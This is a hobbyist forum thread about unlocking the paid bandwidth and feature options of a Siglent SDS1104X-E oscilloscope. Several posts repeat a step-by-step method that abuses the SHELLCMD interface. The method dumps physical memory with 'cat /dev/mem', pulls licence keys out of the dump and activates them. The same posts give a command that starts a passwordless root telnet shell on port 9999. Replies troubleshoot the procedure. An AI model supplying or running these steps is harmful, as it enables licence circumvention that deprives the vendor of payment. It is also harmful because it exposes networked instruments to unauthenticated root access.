« Reply #43 on: February 27, 2019, 06:42:09 am »
Greetings,

I am ready to move forward with my purchase of a Siglent SDS1104X-E and I am wondering if anyone who has recently purchased one of these units can confirm that this hack is still working? Replies and additional info greatly appreciated!

Cheers,

ripnoel
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #44 on: February 27, 2019, 06:59:20 am »
Ordered last month. I used the memory dump and a hex editor to find all the keys.
 

Offline dkggpeters

  • Contributor
  • Posts: 31
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #45 on: March 05, 2019, 02:06:25 am »
Greetings,

I am ready to move forward with my purchase of a Siglent SDS1104X-E and I am wondering if anyone who has recently purchased one of these units can confirm that this hack is still working? Replies and additional info greatly appreciated!

Cheers,

ripnoel

I just hacked mine over the weekend with no issues.  I purchased my unit back in August of 2018.  Also hacked sdg2042x and spd3303x-e.  No issues on all three.
 

Offline NicoEFI

  • Newbie
  • Posts: 1
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #46 on: March 10, 2019, 11:14:08 am »
Hello, I received my new Siglent SDS1104x-e.  :-+
I want to upgrade it but I have a problem with my English in understanding the process  :-// .
Can you help me please (Gege34 maybe?).

1. patch the OS update
this file? SDS1xx4X-E Operating System -V1 (Only For 4-Channel models) (Release Date 06.26.18 )
1. set password = where can I find it?
2. Connect SDS1104X-E by telnet: by USB or RJ45? Can telnet work with Windows 10?
3-4. Input command " ": I use it in Telnet, is that right?
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #47 on: March 10, 2019, 01:31:33 pm »
All the necessary information is here and was found by others (thanks to them :-+).
To summarize, I put what I use below (English and French). I use the memory dump technique, which works very well and avoids flashing an alternative firmware.

English:
All of this only works with firmware <= 6.1.26; from firmware 6.1.33 the SHELLCMD is deactivated. But you can downgrade the scope to 6.1.26 to find the keys and afterwards upgrade it to the latest version.
  • Have a USB stick that is recognized by the oscilloscope (make a screenshot on it to try)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result; it looks like wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to get the serial number, like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (say 1 min; there is 240MB to write to the USB stick)
  • Put the USB stick in a computer; there must be a file memdump.bin
  • Open this file in a hex editor (I use HxD on Windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • Just before it there must be 100M (or 200M, depending on your oscilloscope), which is the active bandwidth, and a little further above (37 characters) SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (which we cut in half), which gives 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license, send the SCPI command MCBD key and turn the scope off and on again
  • Start again from the beginning of the file and look for your serial number (SDSxxxxxxxxxxxx); search until you find the one where MSO is written 5 characters before it
  • A little lower (69 or 117 characters) there is a group of readable characters: 3 groups of 16 characters which correspond to the activation key of the options; if this key appears 2 times, it is already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the SCPI command LCISL option,key
An interesting SCPI command to explore the scope (be careful not to brick it): SHELLCMD telnetd -l/bin/sh -p9999 opens a telnet (root shell) without password.

French:
All of this only works with firmware <= 6.1.26; from firmware 6.1.33 onward the SHELLCMD command has been disabled. But you can downgrade your oscilloscope to firmware 6.1.26 to find the keys, then put the latest firmware back.
  • Have a USB stick that is recognized by the oscilloscope (take a screenshot onto it to try)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result; it has the form wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to retrieve the serial number in the form SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait some time for this command to finish (say 1 min; there is 240MB to write to the USB stick)
  • Put the USB stick in a computer; there must be a file memdump.bin
  • Open this file in a hex editor (I use HxD on Windows)
  • Search for your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • Just before it there must be 100M (or 200M depending on your oscilloscope), which is the active bandwidth, and a little further above (37 characters) SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (which we cut in two), which gives 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license, send the SCPI command MCBD key and turn the scope off and on again
  • Go back to the start of the file and search for your serial number (SDSxxxxxxxxxxxx); keep searching until you find the one where MSO is written 5 characters before it
  • A little lower (69 or 117 characters) there is a group of readable characters: 3 groups of 16 characters which correspond to the activation key of the options; if this key appears 2 times, it is already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the SCPI command LCISL option,key
An interesting SCPI command for exploring the oscilloscope (careful not to break everything): SHELLCMD telnetd -l/bin/sh -p9999 opens telnet access (root shell) without a password.
« Last Edit: June 07, 2019, 06:49:27 am by Gege34 »
 
The following users thanked this post: kikook, patman27, 13, tek2232, HookEm, Apofview, boblatino, ArcticPhoenix0, hevak

Offline vtwin@cox.net

  • Regular Contributor
  • *
  • Posts: 176
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #48 on: March 11, 2019, 09:43:18 am »
English:

It should be noted, and bears repeating, that this process only works if your option keys do not span a 4K memory page boundary. If they do, you could find a portion of a key is located tens of megabytes away in the memory dump from the rest of the key.

cat /dev/mem simply dumps the scope's physical memory, and memory malloc'd by the Linux kernel to the scope task may or may not be contiguous within physical memory.
A hollow voice says 'PLUGH'.
 

Offline mroek

  • Contributor
  • Posts: 49
  • Country: no
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #49 on: March 11, 2019, 10:17:29 am »
English:

It should be noted, and bears repeating, that this process only works if your option keys do not span a 4K memory page boundary. If they do, you could find a portion of a key is located tens of megabytes away in the memory dump from the rest of the key.

cat /dev/mem simply dumps the scope's physical memory, and memory malloc'd by the Linux kernel to the scope task may or may not be contiguous within physical memory.

True, but it seems many have been lucky in finding keys using this method (myself included). And also, it might be possible to just reboot and retry if not successful the first time, since the memory allocations might not be exactly the same for every boot and application launch.
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #50 on: March 11, 2019, 10:27:01 am »
I agree with you (especially vtwin@cox.net) that this is not the most reliable way to find the keys, but it is the simplest and it works for a majority of people.
And to improve the chances of success of this method, it is recommended to do it (the dump of the memory) on an oscilloscope which has just been powered on.
 

Offline ian.ameline

  • Regular Contributor
  • *
  • Posts: 67
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #51 on: March 11, 2019, 01:57:28 pm »
English:

It should be noted, and bears repeating, that this process only works if your option keys do not span a 4K memory page boundary. If they do, you could find a portion of a key is located tens of megabytes away in the memory dump from the rest of the key.

cat /dev/mem simply dumps the scope's physical memory, and memory malloc'd by the Linux kernel to the scope task may or may not be contiguous within physical memory.

True, but it seems many have been lucky in finding keys using this method (myself included). And also, it might be possible to just reboot and retry if not successful the first time, since the memory allocations might not be exactly the same for every boot and application launch.

There is also the fact that the memory allocator will most likely return memory aligned on 16 byte boundaries (to accommodate neon vector types). This makes it impossible for anything 16 bytes or under to cross a page (4k) boundary.
 

Offline vtwin@cox.net

  • Regular Contributor
  • *
  • Posts: 176
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #52 on: March 11, 2019, 03:49:25 pm »
There is also the fact that the memory allocator will most likely return memory aligned on 16 byte boundaries (to accommodate neon vector types). This makes it impossible for anything 16 bytes or under to cross a page (4k) boundary.

My scope returned memory keys not aligned on a 4k boundary.... in one instance, 12 bytes of the key were in one 4k segment, and the remaining 4 bytes of the key were located 20+ megabytes earlier in the memory dump. It was also pretty consistent in this regard, where I would get 8 or 12 bytes in one 4k chunk and have to go look for the remaining portion elsewhere at the start of a 4k chunk. I created 10 cold-start dumps with various delays upon startup to see how the delay time (or things I did on the scope's panel) affected the placement of the keys.

(of course I also was not using the SHELLCMD method to gain root access... I used a version of the firmware with the "known" root password to get to a telnet prompt the "old" way, before the SHELLCMD bypass was known, so this may have played a role too.)

It is good the "simple" method works for a large number of people... but new people reading the thread should simply be aware the "simple" method may not always work and to be prepared for the possibility of a "deep dive".... that's all.
A hollow voice says 'PLUGH'.
 
The following users thanked this post: patman27, HookEm
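
The page-boundary effect argued over in replies #48 to #52, as an added example that is not part of any poster's message and not code from this thread: a toy model in which virtually contiguous bytes are written through a page table into scattered physical frames, which is how a physical-memory image sees them. The page table, the marker string and all function names are constructed for illustration; it shows that a 16-byte object on a 16-byte boundary never straddles a 4K page, while an unaligned or longer run can end up split across non-adjacent frames.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PAGE   4096u   /* page size discussed in the thread */
#define NPAGES 8u      /* size of the toy address space, in pages */

/* Constructed page table: virtual page i is backed by physical frame frame_of[i]. */
static const unsigned frame_of[NPAGES] = {5, 2, 7, 0, 3, 6, 1, 4};

/* Toy physical memory, i.e. what a raw physical-memory image would contain. */
static unsigned char phys[NPAGES * PAGE];

/* Constructed 16-character marker standing in for any short string of interest. */
static const char MARKER[] = "CONSTRUCTEDMARK1";

/* Translate a virtual address to its offset in the physical image. */
static size_t v2p(size_t vaddr)
{
    return (size_t)frame_of[vaddr / PAGE] * PAGE + vaddr % PAGE;
}

/* Write len bytes at a virtual address, byte by byte through the page table. */
static void vwrite(size_t vaddr, const void *src, size_t len)
{
    const unsigned char *s = src;
    for (size_t i = 0; i < len; i++)
        phys[v2p(vaddr + i)] = s[i];
}

/* Read len bytes back through the page table (what the owning process sees). */
static void vread(size_t vaddr, void *dst, size_t len)
{
    unsigned char *d = dst;
    for (size_t i = 0; i < len; i++)
        d[i] = phys[v2p(vaddr + i)];
}

/* 1 if [vaddr, vaddr+len) touches more than one page, else 0. */
static int crosses_page(size_t vaddr, size_t len)
{
    return len != 0 && vaddr / PAGE != (vaddr + len - 1) / PAGE;
}

/* Offset of the first contiguous match in the physical image, or -1. */
static long find_phys(const void *needle, size_t len)
{
    for (size_t i = 0; i + len <= sizeof phys; i++)
        if (memcmp(phys + i, needle, len) == 0)
            return (long)i;
    return -1;
}

/* Number of align-aligned start addresses at which a len-byte object straddles pages. */
static unsigned aligned_straddles(size_t len, size_t align)
{
    unsigned n = 0;
    for (size_t va = 0; va + len <= sizeof phys; va += align)
        n += (unsigned)crosses_page(va, len);
    return n;
}

/* Place the marker 12 bytes before the end of virtual page 0, so that 12 bytes
 * land in one page and 4 in the next, the split reported in reply #52. */
static void place_marker(void)
{
    memset(phys, 0, sizeof phys);
    vwrite(PAGE - 12, MARKER, 16);
}

int main(void)
{
    char seen[17] = {0};

    place_marker();
    vread(PAGE - 12, seen, 16);
    printf("through the page table : %s\n", seen);
    printf("whole marker in image  : %ld\n", find_phys(MARKER, 16));
    printf("first 12 bytes at      : %ld\n", find_phys(MARKER, 12));
    printf("last 4 bytes at        : %ld\n", find_phys(MARKER + 12, 4));
    printf("16-byte objects, 16-aligned, straddling: %u\n", aligned_straddles(16, 16));
    printf("32-byte objects, 16-aligned, straddling: %u\n", aligned_straddles(32, 16));
    return 0;
}
```

In this constructed layout the last 4 bytes sit at a lower offset in the image than the first 12, so a contiguous string search over the image misses the marker even though the owning process reads it back whole.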

Offline HookEm

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #53 on: March 23, 2019, 11:02:05 pm »
@Gege34: Thanks for the excellent 14-step summary:
https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/msg2258400/#msg2258400

@vtwin@cox.net: In my case, you were proven correct!
My Option keys were broken apart: I only found 24 characters (1 complete key + 1/2 of another) at the expected "simple method" location. So I wrote a small C-program to parse the dump file, looking for the other 24 characters (uppercase letters or decimal numbers) at the start of each 4K-page boundary. It turns out that I only found 4 hits in the 240+MB file, so eye-balling each case with a Hex-editor was a very reasonable task!

Wow, I'm so glad I went with 1104X-E... This forum rocks!
« Last Edit: March 23, 2019, 11:09:23 pm by HookEm »
 
The following users thanked this post: Gege34, vtwin@cox.net, Dirtynut

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #54 on: March 23, 2019, 11:35:23 pm »
My Option keys were broken apart: I only found 24 characters (1 complete key + 1/2 of another) at the expected "simple method" location. So I wrote a small C-program to parse the dump file, looking for the other 24 characters (uppercase letters or decimal numbers) at the start of each 4K-page boundary. It turns out that I only found 4 hits in the 240+MB file, so eye-balling each case with a Hex-editor was a very reasonable task!

That's what I call doing your homework!  :-+
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #55 on: April 28, 2019, 02:41:14 am »
@vtwin@cox.net: I wrote a small C-program to parse the dump file, looking for the other 24 characters (uppercase letters or decimal numbers) at the start of each 4K-page boundary. It turns out that I only found 4 hits in the 240+MB file, so eye-balling each case with a Hex-editor was a very reasonable task!

Any chance you'd share that program?

Thanks,
Josh
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #56 on: April 30, 2019, 01:16:48 pm »
English:
  • Have a USB stick that is recognized by the oscilloscope (make a screenshot on it to try)
  • Connect to the oscilloscope with the web interface
  • In the SCPI tab, send the command SCOPEID? and note the result, it is like wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to get the serial number like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (we will say 1mn, there is 240MB to write on the USB stick)
  • Put the USB stick on a computer, there must be a file memdump.bin
  • Open this file in a Hex editor (I use HxD on windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • We must have just before a 100M (or 200M according to its oscilloscope), it's the active bandwidth and still a little (37 characters) above SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (that we cut in half), which makes us 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license it is necessary to send the command SCPI MCBD key and to turn off/on again the scope
  • Start again from the beginning of the file and look for its serial number (SDSxxxxxxxxxxxx), search until find the one where it is written MSO 5 characters before
  • A little lower (69 or 117 characters) a group of readable characters, there are 3 groups of 16 characters which correspond to the activation key of options, if this key appears 2 times is that it's already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the command SCPI LCISL option,key
An interesting SCPI command to explore the scope (warning to not brick it), SHELLCMD telnetd -l/bin/sh -p9999 open a telnet (root shell) without password.

I tried this with firmware 7.1.6.25R2 and it didn't work well at all. The keys in my memdump file were reversed, or in different areas, making it very difficult to guess the correct order and corresponding function of each key.

After upgrading to firmware 7.1.6.1.26 it worked perfectly. The bandwidth keys and options keys were all correctly oriented, and exactly where they should be.

I installed all the option keys via SCPI, and they immediately became active/permanent without need to restart the scope. After restarting, the permanent keys are still working.

This gives me the impression that Siglent was trying to make it easier to hack the keys.

Side note: there was reference in my 25R2 memdump to Pikachu for some reason.  ???

Thanks,
Josh
« Last Edit: April 30, 2019, 01:30:00 pm by KungFuJosh »
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline bloomingtonmike

  • Contributor
  • Posts: 6
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #57 on: May 01, 2019, 11:02:45 pm »
In the above post the serial number command is *IDN? Btw.

Thank you everyone for the reassurance. Mem dump and scpi commands worked great just as Josh said.
 
The following users thanked this post: Apofview

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #58 on: May 02, 2019, 12:55:53 am »
In the above post the serial number command is *IDN? Btw.

Thank you everyone for the reassurance. Mem dump and scpi commands worked great just as Josh said.

The serial number is also listed on the home screen of the Siglent web interface...so no effort really needed there with SCPI.

Glad it worked for you too.  :)
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline bloomingtonmike

  • Contributor
  • Posts: 6
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #59 on: May 02, 2019, 01:20:50 am »
Home screen is where I got it too Josh. It was just bugging me why I could not get the serial number back from the scpi interface so I looked it up. Just a typo.
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #60 on: May 02, 2019, 11:29:17 am »
lol, I was clearly lazier than you about it. I saw it on the home screen, and grabbed it before I tried any of the commands. ;)
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #61 on: May 02, 2019, 12:00:21 pm »
It's not that they are making it easier. It's more a case of a lot of people digging into what's happening to try and resolve their own desires and along the way finding odd quirks that benefit the whole.

It's like a school network admin vs a school of high schoolers: one side is busy with other things, the other is full of hundreds or thousands of bored people with nothing better to do.

So off I go running an incrementing character search on SCPI up to 12 characters because I wanted to find the command for Bode plot mode, ended up digging up a lot in the process, didn't find the command and so went on to disassembling the system application to see if there was any way to add it, found more commands in the process and finally found a workaround.

Then used some of his finding to try and help someone copy off a file of interest and a Linux guru jumped up and thought, "let's try and dump the memory manually with this command some guy has shown us how to use." and here we are today.
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #62 on: May 02, 2019, 01:03:13 pm »
It's not that they are making it easier. It's more a case of a lot of people digging into what's happening to try and resolve their own desires and along the way finding odd quirks that benefit the whole.

It's like a school network admin vs a school of high schoolers: one side is busy with other things, the other is full of hundreds or thousands of bored people with nothing better to do.

So off I go running an incrementing character search on SCPI up to 12 characters because I wanted to find the command for Bode plot mode, ended up digging up a lot in the process, didn't find the command and so went on to disassembling the system application to see if there was any way to add it, found more commands in the process and finally found a workaround.

Then used some of his finding to try and help someone copy off a file of interest and a Linux guru jumped up and thought, "let's try and dump the memory manually with this command some guy has shown us how to use." and here we are today.

Older firmware was significantly harder to get the codes. Newer firmware was simple as hell. There's a significant sequential difference in ease of acquisition based on firmware versions. If that's not on purpose, that would be an insane coincidence.
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #63 on: May 02, 2019, 01:20:17 pm »
Older firmware was significantly harder to get the codes. Newer firmware was simple as hell. There's a significant sequential difference in ease of acquisition based on firmware versions. If that's not on purpose, that would be an insane coincidence.

This is not something preplanned. That is the way the kernel is segmenting the processes' mem in realtime. If you have that particular memory area in a segment frontier, you may end up with the lics split. If the area is in the middle of the segment, then everything will be next to each other.

Of course, based on the average level of expertise of the members, everyone should be able/obliged to find their solution without all these "guides for dummies".
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #64 on: May 02, 2019, 01:26:18 pm »
This is not something preplanned. That is the way the kernel is segmenting the processes' mem in realtime. If you have that particular memory area in a segment frontier, you may end up with the lics split. If the area is in the middle of the segment, then everything will be next to each other.

Of course, based on the average level of expertise of the members, everyone should be able/obliged to find their solution without all these "guides for dummies".

Why was it being segmented differently only based on the firmware change? I tried dumping the memory more than 10 times with 25R2 and it was never together.

BTW- as a dummy, I dig the guides. ;)
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #65 on: May 02, 2019, 01:30:43 pm »
Why was it being segmented differently only based on the firmware change? I tried dumping the memory more than 10 times with 25R2 and it was never together.

Because the program changes make different memory allocations and, as more memory is (de)allocated, you may end up in a segment border.

And, if you dump before going to the lic menu or dump after trying to register a lic, you'll probably obtain completely different results...  ::)
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #66 on: May 02, 2019, 01:55:00 pm »
Because the program changes make different memory allocations and, as more memory is (de)allocated, you may end up in a segment border.

And, if you dump before going to the lic menu or dump after trying to register a lic, you'll probably obtain completely different results...  ::)

I tried a number of different routines and timing with 25R2 to get the dump. All the gibberish besides the codes changed, but never the codes.

From what you're saying, it sounds like I could have reflashed 25R2 and had similar results as the newer firmware? I'd be tempted to downgrade and test that theory if not for my laziness and lack of benefiting from it.
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #67 on: May 02, 2019, 02:02:55 pm »
From what you're saying, it sounds like I could have reflashed 25R2 and had similar results as the newer firmware? I'd be tempted to downgrade and test that theory if not for my laziness and lack of benefiting from it.

No need to. Different people in this forum have reported different results with the same FW versions. Keep yourself in "laziness and lack of benefiting from it" mode.
 
The following users thanked this post: KungFuJosh

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #68 on: May 16, 2019, 07:37:28 pm »
Well, I'm requesting your help, because I tried the steps Gege34 suggested on my SDS1104X-E, and when I tried to dump the memory on the USB key, nothing happened. What am I doing wrong?
 

Offline Illusionist

  • Regular Contributor
  • *
  • Posts: 111
  • Country: gb
  • Why is the rum gone?
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #69 on: May 18, 2019, 07:11:48 am »
Well, I'm requesting your help...

I did that exact procedure myself on a new SDS1104X-E two weeks ago. It worked perfectly for me - couldn't believe it was so simple. Although I did have to search the file twice for the keys because I just didn't recognize them on the first pass.

Are you sure your USB stick is recognized by the 'scope (two of mine were, one wasn't), and does your 'scope have the latest firmware (6.1.26)? The latest firmware makes a difference, from a quick review of the thread, for finding the keys at least.

When I dumped the memory, the USB stick's light started flashing, but never stopped. Eventually I gave up waiting for it to stop (15 minutes or so) and shut down and pulled it. The file was on there.
« Last Edit: May 18, 2019, 07:15:00 am by Illusionist »
Agilent 34410A, GW Instek 8251A, Thurlby 1905A, Siglent DS1104X-E(unlocked), SDG1032X(unlocked), Micsig DP10013 MX, LeCroy PP008 500MHz Probes, Fluke 179
 

Offline Apofview

  • Contributor
  • Posts: 15
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #70 on: May 18, 2019, 12:14:21 pm »
It is *IDN? not IND?, it took me a while...  |O :-DD
A 16GB USB stick worked, no problem. The stick did not have an indicator LED, so after the dump command I pushed the Print button to make sure that the scope is able to write to USB; the scope prints on the LCD that the file was written to USB. Not sure if this check is valid, but for me it worked...
Scope version 8.1.6.
 

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #71 on: May 18, 2019, 12:18:08 pm »
It is *IDN? not IND?, it took me a while...  |O :-DD
A 16GB USB stick worked, no problem. The stick did not have an indicator LED, so after the dump command I pushed the Print button to make sure that the scope is able to write to USB; the scope prints on the LCD that the file was written to USB. Not sure if this check is valid, but for me it worked...
Scope version 8.1.6.

The serial number is also available on the home screen of the web interface, no commands necessary.
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #72 on: May 18, 2019, 10:51:41 pm »
Are you sure your USB stick is recognized by the 'scope (two of mine were, one wasn't), and does your 'scope have the latest firmware (6.1.26)? The latest firmware makes a difference, from a quick review of the thread, for finding the keys at least.

Yes, I am sure it is recognised by the scope, since I could save a screenshot on it and then view it on my computer. I suspect it is the path of the USB stick that is wrong, since I tried SHELLCMD echo something > /usr/bin/siglent/usr/mass_storage/U-disk0/something.txt and it didn't do anything and nothing was on the key when I checked on my computer. Or could I find the path in another way?
« Last Edit: May 18, 2019, 10:54:32 pm by jtruc34 »
 

Offline Apofview

  • Contributor
  • Posts: 15
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #73 on: May 19, 2019, 06:40:21 am »
English:
  • Have a USB stick that is recognized by the oscilloscope (make a screenshot on it to try)
  • Connect to the oscilloscope with the web interface (conect scope to net and enable it in the IO tab)
  • In the SCPI tab, send the command SCOPEID? and note the result, it is like wwww-xxxx-yyyy-zzzz
  • Send the command *IND? to get the serial number like SDSxxxxxxxxxxxx
  • Send the command SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
  • Wait a while for this command to finish (we will say 1min, there is 240MB to write on the USB stick)
  • Put the USB stick on a computer, there must be a file memdump.bin
  • Open this file in a Hex editor (I use HxD on windows)
  • Find your SCOPEID without the - (so wwwwxxxxyyyyzzzz)
  • We must have just before a 100M (or 200M according to its oscilloscope), it's the active bandwidth and still a little (37 characters) above is SDS1000X-E
  • A little lower (116 characters) there must be letters, in fact 2 groups of 16 characters and one of 32 characters (that we cut in half), which makes us 4 groups of 16 characters corresponding to the key to activate the bandwidth option (respectively 100MHz, 200MHz, 50MHz, 70MHz)
  • To activate the corresponding license it is necessary to send the command SCPI MCBD key and to turn off/on again the scope
  • Start again from the beginning of the file and look for its serial number (SDSxxxxxxxxxxxx), search until find the one where it is written MSO 5 characters before
  • A little lower (69 or 117 characters) a group of readable characters, there are 3 groups of 16 characters which correspond to the activation key of options, if this key appears 2 times is that it's already active. The options are respectively (AWG, WIFI, MSO) and can be activated with the command SCPI LCISL option,key

Thank you, this info and of course Dave's teardown and review video are the reasons why I choose Siglent.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #74 on: May 19, 2019, 11:20:57 am »
Well, I'm requesting your help, because I tried the steps Gege34 suggested on my SDS1104X-E, and when I tried to dump the memory on the USB key, nothing happened. What am I doing wrong?

At the end of your command line add ";sync" without quotes.
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #75 on: May 20, 2019, 01:08:15 am »
Well, I'm requesting your help, because I tried the steps Gege34 suggested on my SDS1104X-E, and when I tried to dump the memory on the USB key, nothing happened. What am I doing wrong?

At the end of your command line add ";sync" without quotes.

I've just tried it, and it didn't change anything...
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #76 on: May 20, 2019, 08:24:53 am »
Try this command: SHELLCMD telnetd -l/bin/sh -p9999
And open a telnet application to your Siglent IP (root shell without password)
And list all devices with ls /usr/bin/siglent/usr/mass_storage
to see if you have the U-disk0 or something else.
And you can try the dump command in this telnet: cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #77 on: May 20, 2019, 10:56:11 am »
When I telnetted to it, it requested a login, I wrote root, and I just pressed enter when it requested the password. It then said incorrect password.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #78 on: May 20, 2019, 11:01:27 am »
Using that way, you must telnet to port 9999 !!!
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #79 on: May 20, 2019, 01:03:58 pm »
If I type telnet <ip> 9999, it says "Impossible to connect to the host, on the port 9999." It works if I don't specify any port. Until I have to enter the login and the password, of course...
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #80 on: May 20, 2019, 02:29:18 pm »
If I type telnet <ip> 9999, it says "Impossible to connect to the host, on the port 9999." It works if I don't specify any port. Until I have to enter the login and the password, of course...

That means that your SHELLCMD is not taking effect. Please re-study the matter and try again.
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #81 on: May 20, 2019, 02:37:19 pm »
Also check if you have a firewall rule on your network router.
 

Offline jtruc34

  • Contributor
  • Posts: 37
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #82 on: May 20, 2019, 03:22:41 pm »
Quote
Also check if you have a firewall rule on your network router.

